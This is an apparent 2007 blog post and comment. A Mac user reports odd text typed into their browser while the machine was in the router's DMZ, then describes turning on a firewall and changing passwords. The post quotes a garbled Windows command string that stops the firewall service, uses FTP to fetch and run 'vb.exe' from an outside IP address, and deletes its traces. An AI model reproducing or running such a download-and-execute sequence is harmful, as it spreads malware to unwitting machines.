This showed up on my Firefox search line while I was looking at an LJ page (meaning that a forward-slash was typed [but not by me!]):
This means little on my Mac... no .exe file is ever going to execute... but it still worries me. Maybe it's time to go back behind the firewall of my router. Right now my Mac is in the DMZ.
What the hell?
c net stop sharedaccess 7echo open 67.189.253.250 63882 .. ij 7echo user t g .. ij 7echo get vb.exe .. ij 7echo bye .. ij 7ftp -n -v -s;ij 7del ij 7vb.exe 7exit

Date: 2007-05-02 07:15 pm (UTC)What I noticed is that, finally, somebody was taking over my cursor... and I noticed that I had "incoming TCP/IP access" on in my Timbuktu. Turned that off. Still got random text inserted into text boxes on my Mac.
Then I turned on the personal firewall on the Mac. Seems to have stopped the random text strings.
Time to change passwords, too. I have an easily-guessed one on my Mac local account.
